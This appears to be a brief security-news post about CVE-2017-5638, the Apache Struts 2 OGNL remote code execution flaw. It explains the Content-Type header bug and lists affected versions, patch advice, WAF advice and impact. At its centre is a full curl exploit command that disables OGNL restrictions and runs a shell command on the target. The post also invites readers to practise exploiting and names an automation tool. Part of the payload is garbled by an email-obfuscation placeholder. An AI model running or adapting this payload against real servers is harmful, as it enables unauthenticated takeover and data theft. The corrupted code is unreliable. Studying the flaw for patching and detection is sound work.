Listen to this Post
The CVE-2017-5638 vulnerability in Apache Struts 2 is a critical Remote Code Execution flaw stemming from flawed error handling in the framework’s Jakarta Multipart parser. The exploit works by sending a maliciously crafted `Content-Type` HTTP header value to a Struts endpoint. If the header value is invalid, an exception is thrown, and the error message is constructed using the user-supplied input from the header. Before the exception is handled, the input is evaluated by the Object-Graph Navigation Language (OGNL) interpreter. An attacker can embed OGNL expressions within the `Content-Type` header. Because of the flawed exception handling mechanism, these expressions are executed on the server side with full application privileges. This allows the attacker to achieve remote code execution, enabling them to run arbitrary system commands, exfiltrate data, or gain complete control over the vulnerable server. The attack is particularly dangerous because it is easy to exploit and does not require authentication, making any exposed Struts application a prime target.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability : Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: Patch released 2017-03-07
What Undercode Say:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’whoami’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/struts2-endpoint`
How Exploit:
Craft malicious HTTP request with OGNL payload in Content-Type header targeting file upload endpoint. The payload bypasses security restrictions to execute OS commands. Exploit tools like `struts-pwn` automate this attack.
Protection from this CVE
Immediately upgrade to Struts 2.3.32 or 2.5.10.1. Implement WAF rules to block requests containing “Content-Type” headers with OGNL patterns. Restrict unnecessary network access to Struts applications.
Impact:
Full server compromise. Arbitrary command execution. Data breach and theft. Complete system access for attackers.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
